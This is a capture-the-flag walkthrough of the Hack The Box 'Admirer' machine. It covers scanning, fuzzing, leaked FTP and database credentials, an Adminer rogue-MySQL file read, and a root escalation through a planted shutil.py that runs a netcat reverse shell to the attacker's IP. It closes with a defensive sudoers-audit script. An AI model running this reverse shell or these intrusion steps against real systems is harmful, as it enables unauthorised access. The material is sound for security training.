Lluna's Pure land.

What is life like when singing to wine?

HTB-[admirer]

0x00. Overview

0x01. Information gathering

Ports 21, 22 and 80 are open, and robots.txt lists one directory that crawlers are told not to index: admin-dir.

root@JIYE:~/htb/admirer# nmap -sC -sV -sT 10.10.10.187 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 01:33 EDT
Nmap scan report for 10.10.10.187
Host is up (0.37s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.20 seconds
root@JIYE:~/htb/admirer#

0x02. Visiting port 80

Browsing the site manually turns up nothing useful.

robots.txt matches what the nmap scan reported.

Requesting the admin-dir directory is refused (access denied).

0x03. Fuzzing

The wordlist used for this run:

root@JIYE:~/htb/admirer# ls
big.txt nmap.CVT

Scanning finds two files.

root@JIYE:~/htb/admirer# wfuzz -c -w big.txt -z list,txt-php-html -u http://10.10.10.187/admin-dir/FUZZ.FUZ2Z --hc 404,403 -t 50

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.187/admin-dir/FUZZ.FUZ2Z
Total requests: 61419

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000015592: 200 29 L 39 W 350 Ch "contacts - txt"
000016327: 200 11 L 13 W 136 Ch "credentials - txt"

Total time: 530.5189
Processed Requests: 61419
Filtered Requests: 61417
Requests/sec.: 115.7715

root@JIYE:~/htb/admirer#

Visiting each in turn reveals an FTP username and password.

0x04. FTP login

An SQL file and an archive of the web root are found.

root@JIYE:~/htb/admirer# cat ftp.dic 
ftpuser %n?4Wz}R$tTF7
root@JIYE:~/htb/admirer# ftp 10.10.10.187
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz
226 Directory send OK.
ftp>

Download both files.

ftp> get dump.sql
local: dump.sql remote: dump.sql
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dump.sql (3405 bytes).
226 Transfer complete.
3405 bytes received in 0.07 secs (46.7245 kB/s)
ftp> get html.tar.gz
local: html.tar.gz remote: html.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).
226 Transfer complete.
5270987 bytes received in 10.78 secs (477.4579 kB/s)
ftp> exit
221 Goodbye.
root@JIYE:~/htb/admirer# ls
big.txt dump.sql ftp.dic html.tar.gz nmap.CVT
root@JIYE:~/htb/admirer#

Extracting and inspecting the archive shows a utility-scripts directory under the web root, and one of its scripts contains a database username and password.

root@JIYE:~/htb/admirer/html# ls
assets images index.php robots.txt utility-scripts w4ld0s_s3cr3t_d1r
root@JIYE:~/htb/admirer/html# cd utility-scripts/
root@JIYE:~/htb/admirer/html/utility-scripts# ls
admin_tasks.php db_admin.php info.php phptest.php
root@JIYE:~/htb/admirer/html/utility-scripts# cat db_admin.php
<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";


// TODO: Finish implementing this or find a better open source alternative
?>
root@JIYE:~/htb/admirer/html/utility-scripts#

The site's own username and password are also found. Trying them over SSH fails, so they are presumably out of date.

root@JIYE:~/htb/admirer/html# cat index.php  | grep username
$username = "waldo";
$conn = new mysqli($servername, $username, $password, $dbname);
root@JIYE:~/htb/admirer/html# cat index.php | grep password
$password = "]F7jLHw:*G>UPrTo}~A"d6b";
$conn = new mysqli($servername, $username, $password, $dbname);

0x05. Visiting utility-scripts

Access is still denied; three files are found.

Fuzzing again:

root@JIYE:~/htb/admirer# wfuzz -c -w big.txt -z list,txt-php-html -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z --hc 404,403 -t 50

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
Total requests: 61419

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000005618: 200 51 L 235 W 4157 Ch "adminer - php"
000028853: 200 964 L 4976 W 84030 Ch "info - php"
000041603: 200 0 L 8 W 32 Ch "phptest - php"

Total time: 496.4518
Processed Requests: 61419
Filtered Requests: 61416
Requests/sec.: 123.7159

root@JIYE:~/htb/admirer#

Visiting each in turn, adminer.php turns out to be the login page of a database management tool, Adminer (v4.6.2).

0x06. Adminer (v4.6.2) exploit reference

According to the reference, the vulnerability lets Adminer be made to connect "in reverse" to a MySQL database hosted on one's own server.

exploit

1. First, start MySQL

root@JIYE:~/htb/admirer# systemctl start mysql

2. Create a database to connect to

MariaDB [(none)]> create database admirer;
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]>

3. Create a user

This user's password is demo, and it may log in from any host.

MariaDB [(none)]> create user 'demo'@'%' identified by 'demo';
Query OK, 0 rows affected (0.003 sec)

MariaDB [(none)]>

4. Grant demo full (root-level) privileges

MariaDB [(none)]> grant all privileges on * . * to 'demo'@'%';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]>

5. Create a table

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| admirer |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)

MariaDB [(none)]> use admirer;
Database changed
MariaDB [admirer]> create table test (data varchar(225));
Query OK, 0 rows affected (0.007 sec)

MariaDB [admirer]> show tables;
+-------------------+
| Tables_in_admirer |
+-------------------+
| test |
+-------------------+
1 row in set (0.000 sec)

MariaDB [admirer]>

6. Edit the MySQL configuration file so it accepts connections from any address

root@JIYE:/etc/mysql/mariadb.conf.d# vim 50-server.cnf
···
bind-address = 0.0.0.0
···
root@JIYE:/etc/mysql/mariadb.conf.d# systemctl restart mysql

7. Test logging in as demo

root@JIYE:~# mysql -h localhost -udemo -pdemo
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 38
Server version: 10.3.23-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

0x07. Adminer login

1. Import /etc/passwd into test

The import fails.

2. Import /var/www/html/index.php into test

The import succeeds.

3. Export the test table

The exported file contains the following:

-- Adminer 4.6.2 MySQL dump

SET NAMES utf8;
SET time_zone = '+00:00';
SET foreign_key_checks = 0;
SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO';

SET NAMES utf8mb4;

DROP TABLE IF EXISTS `test`;
CREATE TABLE `test` (
`data` varchar(225) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

INSERT INTO `test` (`data`) VALUES
('<!DOCTYPE HTML>'),
('<!--'),
(' Multiverse by HTML5 UP'),
(' html5up.net | @ajlkn'),
(' Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)'),
('-->'),
('<html>'),
(' <head>'),
(' <title>Admirer</title>'),
(' <meta charset=\"utf-8\" />'),
(' <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, user-scalable=no\" />'),
(' <link rel=\"stylesheet\" href=\"assets/css/main.css\" />'),
(' <noscript><link rel=\"stylesheet\" href=\"assets/css'),
(' </head>'),
(' <body class=\"is-preload\">'),
(''),
(' <!-- Wrapper -->'),
(' <div id=\"wrapper\">'),
(''),
(' <!-- Header -->'),
(' <header id=\"header\">'),
(' <h1><a href=\"index.html\"><strong>Admirer</strong> of skills and visuals</a></h1>'),
(' <nav>'),
(' <ul>'),
(' <li><a href=\"#footer\" class=\"icon solid fa-info-circle\">About</a></li>'),
(' </ul>'),
(' <'),
(' </header>'),
(''),
(' <!-- Main -->'),
(' <div id=\"main\"> '),
(' <?php'),
(' $servername = \"localhost\";'),
(' $username = \"waldo\";'),
(' $password = \"&<h5b~yK3F#{PaPB&dA}{H>\";'),
(' $dbname = \"admirerdb\";'),
(''),
(' // Create connection'),
(' $conn = new mysqli($servername, $username, $password, $dbname);'),
(' // Check connection'),
(' if ($conn->connect_error) {'),
(' die(\"Connection failed: \" . $conn->connect_error);'),
(' }'),
(''),
(' $sql = \"SELECT * FROM items\";'),
(' $result = $conn->query($sql);'),
(''),
(' if ($result->num_rows > 0) {'),
(' // output data of each row'),
(' while($row = $result->fetch_assoc()) {'),
(' echo \"<article class=\'thumb\'>\n\";'),
(' echo \"<a href=\'\".$row[\"image_path\"].\"\' class=\'image\'><img src=\'\".$row[\"thumb_path\"].\"\' alt=\'\' /></a>\n\";'),
(' echo \"<h2>\".$row[\"title\"].\"</h2>\n\";'),
(' echo \"<p>\".$row[\"text\"].\"</p>\n\";'),
(' echo \"</article>\n\";'),
(' }'),
(' } else {'),
(' echo \"0 results\";'),
(' }'),
(' $conn->close();'),
(' ?>'),
(' </div>'),
(''),
(' <!-- Footer -->'),
(' <footer id=\"footer\" class=\"panel\">'),
(' <div class=\"inner split\">'),
(' <div>'),
(' <section>'),
(' <h2>Allow yourself to be amazed</h2>'),
(' <p>Skills are not to be envied, but to feel inspired by.<br>'),
(' Visual arts and music are there to take care of your soul.<br><br>'),
(' Let your senses soak up these wonders...<br><br><br><br>'),
(' </p>'),
(' </section>'),
(' <section>'),
(' <h2>Follow me on ...</h2>'),
(' <ul class=\"icons\">'),
(' <li><a href=\"#\" class=\"icon brands fa-twitter\"><span class=\"label\">Twitter</span></a></li>'),
(' <li><a href=\"#\" class=\"icon brands fa-facebook-f\"><span class=\"label\">Facebook</span></a></li>'),
(' <li><a href=\"#\" class=\"icon brands fa-instagram\"><span class=\"label\">Instagram</span></a></li>'),
(' <li><a href=\"#\" class=\"icon brands fa-github\"><span class=\"label\">GitHub</span></a></li>'),
(' <li><a href=\"#\" class=\"icon brands fa-dribbble\"><span class=\"label\">Dribbble</span></a></li>'),
(' <li><a href=\"#\" class=\"icon brands fa-linkedin-in\"><span class=\"label\">LinkedIn</span></a></li>'),
(' </ul>'),
(' </section>'),
(' </div>'),
(' <div>'),
(' <section>'),
(' <h2>Get in touch</h2>'),
(' <form method=\"post\" action=\"#\"><!-- Still under development... This does not send anything yet, but it looks nice! -->'),
(' <div class=\"fields\">'),
(' <div class=\"field half\">'),
(' <input type=\"text\" name=\"name\" id=\"name\" placeholder=\"Name\" />'),
(' </div>'),
(' <div class=\"field half\">'),
(' <input type=\"text\" name=\"email\" id=\"email\" placeholder=\"Email\" />'),
(' </div>'),
(' <div class=\"field\">'),
(' <textarea name=\"message\" id=\"message\" rows=\"4\" placeholder=\"Message\"></textarea>'),
(' </div>'),
(' </div>'),
(' <ul class=\"actions\">'),
(' <li><input type=\"submit\" value=\"Send\" class=\"primary\" /></li>'),
(' <li><input type=\"reset\" value=\"Reset\" /></li>'),
(' </ul>'),
(' </form>'),
(' </section>'),
(' </div>'),
(' </div>'),
(' </footer>'),
(''),
(' </div>'),
(''),
(' <!-- Scripts -->'),
(' <script src=\"assets/js/jquery.min.js\"></script>'),
(' <script src=\"assets/js/jquery.poptrox.min.js\"></script>'),
(' <script src=\"assets/js/browser.min.js\"></script>'),
(' <script src=\"assets/js/breakpoints.min.js\"></script>'),
(' <script src=\"assets/js/util.js\"></script>'),
(' <script src=\"assets/js/main.js\"></script>'),
(''),
(' </body>'),
('</html>');

-- 2020-09-05 08:07:51

The username and password are found:

$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

0x08. SSH login

root@JIYE:~/htb/admirer# cat user 
waldo &<h5b~yK3F#{PaPB&dA}{H>
root@JIYE:~/htb/admirer# ssh waldo@10.10.10.187
waldo@10.10.10.187's password:
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Sat Sep 5 09:06:54 2020 from 10.10.14.80
waldo@admirer:~$

Find the flag:

waldo@admirer:~$ ls
test user.txt
waldo@admirer:~$ cat user.txt
*******************************
waldo@admirer:~$

0x09. Privilege escalation

/opt/scripts/admin_tasks.sh can be used for privilege escalation.

waldo@admirer:~$ sudo -l
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
waldo@admirer:~$

Reading the script shows that it is used to back up data.

waldo@admirer:/opt/scripts$ ls
admin_tasks.sh backup.py
waldo@admirer:/opt/scripts$ cat admin_tasks.sh
#!/bin/bash

view_uptime()
{
    /usr/bin/uptime -p
}

view_users()
{
    /usr/bin/w
}

view_crontab()
{
    /usr/bin/crontab -l
}

backup_passwd()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
        /bin/cp /etc/passwd /var/backups/passwd.bak
        /bin/chown root:root /var/backups/passwd.bak
        /bin/chmod 600 /var/backups/passwd.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_shadow()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
        /bin/cp /etc/shadow /var/backups/shadow.bak
        /bin/chown root:shadow /var/backups/shadow.bak
        /bin/chmod 600 /var/backups/shadow.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_db()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running mysqldump in the background, it may take a while..."
        #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
        /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}



# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
    option=$1
    case $option in
        1) view_uptime ;;
        2) view_users ;;
        3) view_crontab ;;
        4) backup_passwd ;;
        5) backup_shadow ;;
        6) backup_web ;;
        7) backup_db ;;

        *) echo "Unknown option." >&2
    esac

    exit 0
fi


# Interactive way, to be called from the command line
options=("View system uptime"
         "View logged in users"
         "View crontab"
         "Backup passwd file"
         "Backup shadow file"
         "Backup web data"
         "Backup DB"
         "Quit")

echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
    case $REPLY in
        1) view_uptime ; break ;;
        2) view_users ; break ;;
        3) view_crontab ; break ;;
        4) backup_passwd ; break ;;
        5) backup_shadow ; break ;;
        6) backup_web ; break ;;
        7) backup_db ; break ;;
        8) echo "Bye!" ; break ;;

        *) echo "Unknown option." >&2
    esac
done

exit 0
waldo@admirer:/opt/scripts$

Reading backup.py shows that it archives /var/www/html/ into /var/backups/html as a compressed tarball (the old destination under the FTP directory is commented out).

Taking the two scripts together: running admin_tasks.sh (option 6) calls backup.py to back up the data.

waldo@admirer:/opt/scripts$ cat backup.py 
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)
waldo@admirer:/opt/scripts$

Trying to modify backup.py fails: no write permission.

Instead, write our own shutil.py and point Python's module search path at it.

waldo@admirer:~$ mkdir fjy
waldo@admirer:~$ cd fjy
waldo@admirer:~/fjy$ cat shutil.py
import os
def make_archive(x,y,z):
    os.system("nc 10.10.17.216 6666 -e '/bin/bash'")
waldo@admirer:~/fjy$

Listen on Kali:

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...

Run it:

waldo@admirer:~/fjy$ sudo PYTHONPATH=~/fjy /opt/scripts/admin_tasks.sh 
[sudo] password for waldo:

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option:

Choose 6:

Choose an option: 6
Running backup script in the background, it might take a while...
waldo@admirer:~/fjy$

Kali receives a shell:

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.187] 38682
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@admirer:/home/waldo/fjy# whoami
whoami
root
root@admirer:/home/waldo/fjy# ^Z
[1]+ 已停止 nc -nvlp 6666
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 6666

root@admirer:/home/waldo/fjy# ls
shutil.py
root@admirer:/home/waldo/fjy# cd
root@admirer:~# ls
root.txt
root@admirer:~# cat root.txt
*******************************
root@admirer:~#
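The escalation above works because the sudo rule "(ALL) SETENV: /opt/scripts/admin_tasks.sh" carries the SETENV tag, which lets the caller override env_reset and hand PYTHONPATH to the Python helper that the script launches as root. As an added, defender-side example (not part of the original write-up and not the box's own scripts), the POSIX shell snippet below does two things: it audits sudoers-formatted text for rules carrying SETENV, and it shows how a wrapper such as admin_tasks.sh can launch its helper with a rebuilt environment so an inherited PYTHONPATH never reaches the interpreter. The sample sudoers lines are constructed for the demo (only the waldo rule is taken from the sudo -l output above), the function names are mine, and the PATH value mirrors the secure_path shown by sudo -l.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit sudoers for SETENV and
# launch privileged helpers with a scrubbed environment.

# Constructed sample sudoers content. Only the waldo rule is the one observed
# on the box; the other lines are invented for contrast.
SAMPLE_SUDOERS='Defaults env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
waldo ALL=(ALL) SETENV: /opt/scripts/admin_tasks.sh
backup ALL=(root) NOPASSWD: /usr/bin/rsync
alice ALL=(ALL) NOSETENV: /usr/bin/systemctl restart nginx'

# Print every rule on stdin that carries the SETENV tag. Comment and Defaults
# lines are skipped, and NOSETENV is deliberately not a hit: the tag must be
# preceded by start of line, whitespace, a comma, or a colon (tags can be
# chained, e.g. NOPASSWD:SETENV:).
audit_sudoers() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*Defaults' \
        | grep -E '(^|[[:space:],:])SETENV:'
}

# Count the SETENV rules in a sudoers string so a cron job or test can alert
# on a nonzero number.
count_setenv_rules() {
    printf '%s\n' "$1" | audit_sudoers | grep -c .
}

# Launch a command with an explicitly rebuilt environment. The original
# admin_tasks.sh runs "/opt/scripts/backup.py &" and inherits whatever sudo
# let through; env -i discards everything and only PATH and HOME are put back,
# so a caller-supplied PYTHONPATH (or LD_PRELOAD, PERL5LIB, ...) is dropped.
run_scrubbed() {
    env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \
        HOME=/root "$@"
}

# Report what a child process sees for PYTHONPATH after scrubbing
# ("unset" when the variable is absent). Used to verify run_scrubbed.
child_pythonpath() {
    run_scrubbed sh -c 'printf "%s" "${PYTHONPATH-unset}"'
}

# Usage: flag risky rules, then show that the scrub actually works even when
# the caller has exported a hostile PYTHONPATH.
if [ "$(count_setenv_rules "$SAMPLE_SUDOERS")" -gt 0 ]; then
    echo "sudoers rules with SETENV (caller may override env_reset):"
    printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
fi
PYTHONPATH=/tmp/constructed-hijack-dir; export PYTHONPATH
echo "PYTHONPATH seen by scrubbed child: $(child_pythonpath)"
```

The root cause is the SETENV tag itself, so the first fix is to remove it from the rule; sudo's env_reset then strips PYTHONPATH before the script ever runs. Scrubbing the environment inside the script, as run_scrubbed does, is defence in depth for the case where the tag is needed for some other variable, and launching the helper with python3 -I (isolated mode, which ignores PYTHON* environment variables) closes the same hole from the interpreter side.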
------------- Paper is short, feelings are long; see you next time -------------